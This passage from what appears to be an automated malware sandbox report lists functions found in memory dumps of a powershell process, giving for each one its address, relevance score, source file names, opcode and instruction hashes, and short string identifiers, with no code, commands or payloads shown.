                      • Instruction ID: 38d83ac58eb6ccde0ef625844d945884a26a33b4a4b42633c3018083c6419e58
                      • Opcode Fuzzy Hash: 193800e2c638b97bd8cdc3e02721eeb12950cccaa0ef631fd190e2e0fad7a645
                      • Instruction Fuzzy Hash: EF9138B0704306CFCB1D9B39881566A7BE2AFC2204F1484AAD955DF3D2DB36D845CB62
                      Function 07157850 Relevance: 4.0, Strings: 3, Instructions: 268COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q
                      • API String ID: 0-1196845430
                      • Opcode ID: 8e70660af499d56cd2f8283f5666716c5a930bf355cc5387263c305952e6b9cd
                      • Instruction ID: 71c8d1ebf0408c5405722bf6d1d2db0fa2455362f9378d2f636196dfce5df3ca
                      • Opcode Fuzzy Hash: 8e70660af499d56cd2f8283f5666716c5a930bf355cc5387263c305952e6b9cd
                      • Instruction Fuzzy Hash: 2CB19BB4A00205CFCB19DB68C946B9EBBB2AF88314F15C459D8252F3D5CB75EC85CBA1
                      Function 07156A63 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q
                      • API String ID: 0-2697143702
                      • Opcode ID: f9cc341964f26b1b9c22c2353dff98d9f181defe67cebeb5c0dc9cf2d6403ae9
                      • Instruction ID: e96ed903bdd58bc940acd4487d7636dcb6524c88eb1cd2c6f3a6309b6bdf9bb0
                      • Opcode Fuzzy Hash: f9cc341964f26b1b9c22c2353dff98d9f181defe67cebeb5c0dc9cf2d6403ae9
                      • Instruction Fuzzy Hash: 70F19E74B40214CFDB28EB68CD55B5ABBB2AB84304F1084A9D9096F3A5CB71ED85CF91
                      Function 07150D2B Relevance: 2.6, Strings: 2, Instructions: 65COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q$$^q
                      • API String ID: 0-355816377
                      • Opcode ID: e1648ccfebd76e4d2cb3b59fcb25e1ffcf6740f5bffb678740e9549f97ebc306
                      • Instruction ID: 86af589a4ed67ee1c85656d1b8cc4933b8b6fb6489ec976f4eb3f9efab624819
                      • Opcode Fuzzy Hash: e1648ccfebd76e4d2cb3b59fcb25e1ffcf6740f5bffb678740e9549f97ebc306
                      • Instruction Fuzzy Hash: 3C117FB5609346DFD72A8AB48840966BF75EF8A310B19809BD8548F1D2D735E805C751
                      Function 0715100A Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q
                      • API String ID: 0-388095546
                      • Opcode ID: 1a8aa7295e3287cd064c3d8a74accd5c29be2b32aec5189d9134ca802bb570b7
                      • Instruction ID: aeff496a578acaaf73c6c1e99198083a10ac3da1a5428a29a0128e34b0164322
                      • Opcode Fuzzy Hash: 1a8aa7295e3287cd064c3d8a74accd5c29be2b32aec5189d9134ca802bb570b7
                      • Instruction Fuzzy Hash: 30814AB1B0434AEFC72B4B79984076ABBA5AFC2210F2484ABDC64CB291CB31DC45D761
                      Function 071535AF Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: tP^q
                      • API String ID: 0-2862610199
                      • Opcode ID: bb20f4631692305346b1131fa1c0cb9d92efe650b6d8e8c0fbc57af953d5a875
                      • Instruction ID: 0304a05e16df32c178976f7fb2179a3668186d90b0f1acc7306eb53b6efc308a
                      • Opcode Fuzzy Hash: bb20f4631692305346b1131fa1c0cb9d92efe650b6d8e8c0fbc57af953d5a875
                      • Instruction Fuzzy Hash: F06125F4A09281DFC71A8B64C854A16BFB1AF86218F19C5DED8648F2D3C731DD46C762
                      Function 07158777 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q
                      • API String ID: 0-1614139903
                      • Opcode ID: 47427dc860191eeaaf8d4d3f497b972aadb360298ec66dda538fdab46debc803
                      • Instruction ID: 07eb59e0fa86dda89ddb0417278e377f6bdce4ef9d345c220f971718894f8c96
                      • Opcode Fuzzy Hash: 47427dc860191eeaaf8d4d3f497b972aadb360298ec66dda538fdab46debc803
                      • Instruction Fuzzy Hash: 914127B0B04302CFCB1E8F298995B3A7BE2AF81344F1584A5DD619F2D2D735D845CB62
                      Function 071558C0 Relevance: .5, Instructions: 541COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d9f5de416c5cefb1a247a370c7045023b67980299511ec31f9530c56bfcd89d9
                      • Instruction ID: d69acd3b4556e6476957f664b91b193d0cddc29afb2c64c54793db52394725c2
                      • Opcode Fuzzy Hash: d9f5de416c5cefb1a247a370c7045023b67980299511ec31f9530c56bfcd89d9
                      • Instruction Fuzzy Hash: 9F3217B4B10205CFD728CB98C945E59BBB3BB85314F55C099D829AF396CB72EC46CB81
                      Function 07156035 Relevance: .5, Instructions: 483COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06adab489b76004f1c1d192978a9e255d85d2a849d59b0afa12d57b39f995d9e
                      • Instruction ID: f4fd13720d3a745b3f83258ec132cef64d37c3eb03c7c7c78a3f037d21b0f774
                      • Opcode Fuzzy Hash: 06adab489b76004f1c1d192978a9e255d85d2a849d59b0afa12d57b39f995d9e
                      • Instruction Fuzzy Hash: 1B1249B4B10205CFD728CB98C945E59BBB3AF85304F55C059E825AF396CB72EC46CB81
                      Function 04259300 Relevance: .3, Instructions: 321COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59dec5ce21942bb7d39980848b6f7adc902fabd1e38ea9756c92ad4c876e8a5d
                      • Instruction ID: 19b8c6abafbf4df6b6a39bedc2539cc5084fc65c1d9002c23b99ab9ec61004ea
                      • Opcode Fuzzy Hash: 59dec5ce21942bb7d39980848b6f7adc902fabd1e38ea9756c92ad4c876e8a5d
                      • Instruction Fuzzy Hash: CBC1AD75B10209DFCB14DFA4D544A9DBBB6FF84310F1585A9E806AB365CB38ED89CB80
                      Function 0425EF64 Relevance: .3, Instructions: 279COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7e10e36356fc4ff2ded33584a45be1d118c32e5f2568c65a69a236ca8e2ce0a
                      • Instruction ID: 83574bad559faeb85db9aa9d9747ba84a5b227be9f4e1215df4ac9edbec4c58f
                      • Opcode Fuzzy Hash: b7e10e36356fc4ff2ded33584a45be1d118c32e5f2568c65a69a236ca8e2ce0a
                      • Instruction Fuzzy Hash: CAB18EB0F1020ADFDF10DFA8DA8579DBBF1AF48314F158529D814E7264EB74A845CB91
                      Function 0425F837 Relevance: .3, Instructions: 272COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aa5eb27ad048bd99f55037ba483bc898e750c6884143e42ed0da5a86b790582c
                      • Instruction ID: 765226409666f39bdcfdd0b9317c0a00d953b0566fce7fbf09a503894861e7a2
                      • Opcode Fuzzy Hash: aa5eb27ad048bd99f55037ba483bc898e750c6884143e42ed0da5a86b790582c
                      • Instruction Fuzzy Hash: 99B19E70F2020ADFDB10CFA8DA9579DBBF2BF48314F158529D814E7264EB74A885CB81
                      Function 07155180 Relevance: .2, Instructions: 247COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf4a6e39e30ad4fc3f650183f7c51ec422b45f5f0210ef42c3eb975bbc58dd3d
                      • Instruction ID: e250798e37d75dba7a2c7c4371e38433a7eb7349ef43bf4b6139985ae4f91c16
                      • Opcode Fuzzy Hash: bf4a6e39e30ad4fc3f650183f7c51ec422b45f5f0210ef42c3eb975bbc58dd3d
                      • Instruction Fuzzy Hash: B0918EB0B50204DFDB18DB68C945B9EBBA3AF98304F21C069E9156F795CB72EC41CB91
                      Function 07155163 Relevance: .2, Instructions: 230COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 709ae5fe3c0182c1aff1e2ed36e9a89ede3ab474f68b970434dae88a2bc32848
                      • Instruction ID: fdc263f26ec813069f4b15b00fdb30ff91856637c227aaa6c60b6c7fa8b82e8f
                      • Opcode Fuzzy Hash: 709ae5fe3c0182c1aff1e2ed36e9a89ede3ab474f68b970434dae88a2bc32848
                      • Instruction Fuzzy Hash: A9919BB0A40204DFDB19DB64C945B9EBBB3AF88314F218069E9156F3A1CB76EC41CB91
                      Function 04258B68 Relevance: .2, Instructions: 198COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1e4067a0a1a091097ac1cd0af7a28dbc1174ed8f211af8dc6c203e0190fef6b
                      • Instruction ID: fe67a9b5df8e0ef1a6536d09dbcb66d3b7b79887e572bd25ce8dd27f89a3e9da
                      • Opcode Fuzzy Hash: c1e4067a0a1a091097ac1cd0af7a28dbc1174ed8f211af8dc6c203e0190fef6b
                      • Instruction Fuzzy Hash: 07718D30B162449FCB15EB74D444AAEBBF2AF89304F1884A9E805EB362D775EC85CB50
                      Function 04259AC8 Relevance: .2, Instructions: 194COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c11404679a602d22bfc7804999b45106a0616d97321f3ff8d31072cc85465d9f
                      • Instruction ID: c7a0d40347c84d6502860c44563d22537167ab6b81904ab3777fd35b86e51267
                      • Opcode Fuzzy Hash: c11404679a602d22bfc7804999b45106a0616d97321f3ff8d31072cc85465d9f
                      • Instruction Fuzzy Hash: 0071AF70A00209CFCB14DF69D840A9EBBF6FF89314F14856AE419DB661DB75EC86CB90
                      Function 04259C36 Relevance: .2, Instructions: 188COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 194e467efa447850ad0e1340ba3461f095ac288d7fc5ca620e7c4c30a1eb584c
                      • Instruction ID: d2383492a9ea1e99cb5b1cff2df2f61e556b29242cf534857cd8cca93604622d
                      • Opcode Fuzzy Hash: 194e467efa447850ad0e1340ba3461f095ac288d7fc5ca620e7c4c30a1eb584c
                      • Instruction Fuzzy Hash: E9714970A10209DFDB14DFA9D544BADBBF6BF88304F148429D416AB2A0DB75AC86CB41
                      Function 04259AB3 Relevance: .1, Instructions: 147COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89ee1771a5ebc3b0e51d7c4e39582554e6e85b7f1e395e014a73589dbe331df1
                      • Instruction ID: 3b26a3bc23eb9197f64aa32fce301dd19bc4aae0fa35e89350b4465c651580fc
                      • Opcode Fuzzy Hash: 89ee1771a5ebc3b0e51d7c4e39582554e6e85b7f1e395e014a73589dbe331df1
                      • Instruction Fuzzy Hash: A8516FB0A10209DFDB14DFA9C9547ADBBF6FF88344F148429D406AB7A0DBB5AC85CB50
                      Function 04252C68 Relevance: .1, Instructions: 131COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9463335c90bebe56822feb6d6ea5335b6d2ae0037fcf9759d814bd4b54fb9914
                      • Instruction ID: 69efb0f4037771bbe4a88c4dd89f68c495e1c70e2ee7950cda0b844946c09ffe
                      • Opcode Fuzzy Hash: 9463335c90bebe56822feb6d6ea5335b6d2ae0037fcf9759d814bd4b54fb9914
                      • Instruction Fuzzy Hash: 525178B4A15286CFCB06CF58C4949AABBB1FF49310B15459AD8419B2A6C735FC50CFA0
                      Function 04259859 Relevance: .1, Instructions: 119COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d1dc1d6c9aa6c1c4d8ba1f4da934c11bef35099fde55d04b51fa9f2599bf29c3
                      • Instruction ID: c7217acea706a85072a7c7f3f23d23a865367f13040345a2264f3bf2c3775bb4
                      • Opcode Fuzzy Hash: d1dc1d6c9aa6c1c4d8ba1f4da934c11bef35099fde55d04b51fa9f2599bf29c3
                      • Instruction Fuzzy Hash: A3415E71B00241CFDB15DB65C558AADBBF6EF89750F084469E806EB7A0DB39EC81CB50
                      Function 07159F87 Relevance: .1, Instructions: 118COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2bdea14f89c37c8d8da561730a52e3ca88e00d5692ec273e8f18f67513b9a61
                      • Instruction ID: 37c96ad960ee715851d640c20f6a4b808f09c0c3d7e5551caccf3666da9a9fde
                      • Opcode Fuzzy Hash: b2bdea14f89c37c8d8da561730a52e3ca88e00d5692ec273e8f18f67513b9a61
                      • Instruction Fuzzy Hash: 53410BB0A50302CFCB2E8F288981A6A7FA2AF85344F15C1A6DD55AF3D1D735DC41CBA1
                      Function 04252C63 Relevance: .1, Instructions: 106COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e70f7b6c0f0e1182948b7dc18d6c9096ba6d37a4c5dfb8997dd05d04f69c51a8
                      • Instruction ID: fb74b34afc79e8d870558f1c3dd720df126185fa9bcb27e06cddf97d058ea0c6
                      • Opcode Fuzzy Hash: e70f7b6c0f0e1182948b7dc18d6c9096ba6d37a4c5dfb8997dd05d04f69c51a8
                      • Instruction Fuzzy Hash: 3941F2B4A11509DFCB09CF99C1949AABBB1FF48310B118699D815AB3A4C736FC90CFA0
                      Function 07157C96 Relevance: .1, Instructions: 102COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3da3d879d7c926ff29776fb79916246de27309672ea15f4d6160aa278c990c11
                      • Instruction ID: d7012a5c9d05a5a672ca1171e95b4b8bfb9759118c08093dd477e3221edd22bf
                      • Opcode Fuzzy Hash: 3da3d879d7c926ff29776fb79916246de27309672ea15f4d6160aa278c990c11
                      • Instruction Fuzzy Hash: FF315074B402149FD708AB64C955FAE7AB3ABC4304F21C418E9116F395CF76DC468B91
                      Function 0425C404 Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 47b72af617098cc60e7b5215c8719603dce407445aadf9d310aebe614cdf7d5b
                      • Instruction ID: b9f8c402e6cdef0d8c3ab9989ba809f16d106c13453baa92cd0da9512b5c99c3
                      • Opcode Fuzzy Hash: 47b72af617098cc60e7b5215c8719603dce407445aadf9d310aebe614cdf7d5b
                      • Instruction Fuzzy Hash: FA312330B112188FCB269B7088547EEBBB1AF49749F0544E9D409A7362EF35DE45CF81
                      Function 042541AB Relevance: .1, Instructions: 68COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1cfd55563c97641018a557be58b5b06867109a2b4830dab1340dae5df43ea9ed
                      • Instruction ID: 6156322fb3f6cb3c955cb8de56c5754b31d7dc8186c6eaf883977baa10dbb450
                      • Opcode Fuzzy Hash: 1cfd55563c97641018a557be58b5b06867109a2b4830dab1340dae5df43ea9ed
                      • Instruction Fuzzy Hash: 56210574A002199FCB04DF99C5809AAFBB1FF48310B158599E809EB365C731FD81CFA0
                      Function 04254A78 Relevance: .1, Instructions: 68COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1951dc8330328ee003ae720dd5e94c94a4329c1592e6056adbb25df1ea868367
                      • Instruction ID: 2c733c87f935c1e0bbcbad1ae7eb5e496a9672ab7b592fa4294cd614df3d6566
                      • Opcode Fuzzy Hash: 1951dc8330328ee003ae720dd5e94c94a4329c1592e6056adbb25df1ea868367
                      • Instruction Fuzzy Hash: BD210574A002099FCB04DF59C980AAEFBB5FF48310B248599E859E7362C731FD91CBA0
                      Function 04254A88 Relevance: .1, Instructions: 68COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cc3f8fd94db876a9bd0f4c1ea2829d44a789ac32469e45c48912ac8fd38bbe7
                      • Instruction ID: cc3b1417e766a86a76003006499a2f06a3d35379fc7d23406dd0e9c893d4cbdc
                      • Opcode Fuzzy Hash: 6cc3f8fd94db876a9bd0f4c1ea2829d44a789ac32469e45c48912ac8fd38bbe7
                      • Instruction Fuzzy Hash: 2E21E474A101099FCB04DF59C980AAEFBB5FB48310B248569E919A7761C731FC91CBA0
                      Function 042541B8 Relevance: .1, Instructions: 67COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d47998bc3420df08376e3077b7d7c094e1932c235d3a6d8254a807882b6cf5fb
                      • Instruction ID: 3c93241cdc61c4dc38936742cdc668760190e567ad8c30eae6f874c29aa4702a
                      • Opcode Fuzzy Hash: d47998bc3420df08376e3077b7d7c094e1932c235d3a6d8254a807882b6cf5fb
                      • Instruction Fuzzy Hash: E9211674A001199FCB04DF99C5849AAFBB1FF88310B248559E919EB721C731FC81CBA0
                      Function 042535D0 Relevance: .1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f0f3e4e3e3c4e3ef66d1c24f00f36c30d3d49fdcb4909a73884d5673120ea624
                      • Instruction ID: 7ac41de6481646d7c2e1bfd0187fed4843e489b24944fe686933e2a0d549d4a4
                      • Opcode Fuzzy Hash: f0f3e4e3e3c4e3ef66d1c24f00f36c30d3d49fdcb4909a73884d5673120ea624
                      • Instruction Fuzzy Hash: E6211774A0021A8FCB04CF98D4809AEBBB5FF89310B158499E919EB352C735FC41CBA1
                      Function 042535CB Relevance: .1, Instructions: 56COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d1c8b25116a5a5e590f9a3c14c1b74312b546cfc6f8f4a0331c3fdd87f283128
                      • Instruction ID: 31f45b8f5fa8ab243ea9ee0f38031dd78cfb27ad4efbb9409cca77d799c1d036
                      • Opcode Fuzzy Hash: d1c8b25116a5a5e590f9a3c14c1b74312b546cfc6f8f4a0331c3fdd87f283128
                      • Instruction Fuzzy Hash: 561107B4A002199FCB04CF98D5809AEFBF5FF89310B158599E919AB352C731FD41CBA5
                      Function 0092D01D Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249440002.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_92d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4dcad2662c9d5f5d145de98082f49d3adf2bc09d0c60ce6b0e7bc66fc3b4ed76
                      • Instruction ID: 651e3097a35980f7e290e12562c2361ed3b032e17b95e0b3db3626191b34cc1f
                      • Opcode Fuzzy Hash: 4dcad2662c9d5f5d145de98082f49d3adf2bc09d0c60ce6b0e7bc66fc3b4ed76
                      • Instruction Fuzzy Hash: F3012B3104A310DAE7104A26DDC4767BF9CDF41324F18C52AEC484F15AC279DC41C6F1
                      Function 0092D006 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249440002.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_92d000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3321a88dfed8fc04445a7e096d60fdd7686e3e2135067fce075f9ae4659f0768
                      • Instruction ID: 936e8fd89fea144feb9f7e1a8660426baccd4010296f066cf02c91013c3131f0
                      • Opcode Fuzzy Hash: 3321a88dfed8fc04445a7e096d60fdd7686e3e2135067fce075f9ae4659f0768
                      • Instruction Fuzzy Hash: 8901406104E3D09ED7124B259C94756BFB8DF53224F1DC1DBD888CF1A7C2699849C7B2

                      Non-executed Functions

                      Function 07152770 Relevance: 12.8, Strings: 10, Instructions: 305COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3512890053
                      • Opcode ID: 30cf74a7a4ac8f85ab1f571945106e0d8f270a0b15b50ca8ec2b9699e0f14e0e
                      • Instruction ID: 98b244bc2125ef0b9c669dd74aaf23e110adaf1a47f42c202c1b56a13571804b
                      • Opcode Fuzzy Hash: 30cf74a7a4ac8f85ab1f571945106e0d8f270a0b15b50ca8ec2b9699e0f14e0e
                      • Instruction Fuzzy Hash: 9FA148F2B04216CFCB3E4B69981466A7BE1BF82610F14846ADC25DB3D5DF35C886C7A1
                      Function 07154460 Relevance: 10.5, Strings: 8, Instructions: 491COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3732357466
                      • Opcode ID: ec52697679a5b7fee8ea456e49f7c969474bb6dae9d89bba72537e7f20b73071
                      • Instruction ID: b2847ece77659601e3eb0be90d93288bd77bd5d37ef981cc7b1f013c4a7f1401
                      • Opcode Fuzzy Hash: ec52697679a5b7fee8ea456e49f7c969474bb6dae9d89bba72537e7f20b73071
                      • Instruction Fuzzy Hash: 51F149B1B04386DFCB2D8E79C84466ABBE6AFC5610F14847ADC65CF295DB31C884C7A1
                      Function 07159620 Relevance: 9.2, Strings: 7, Instructions: 478COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
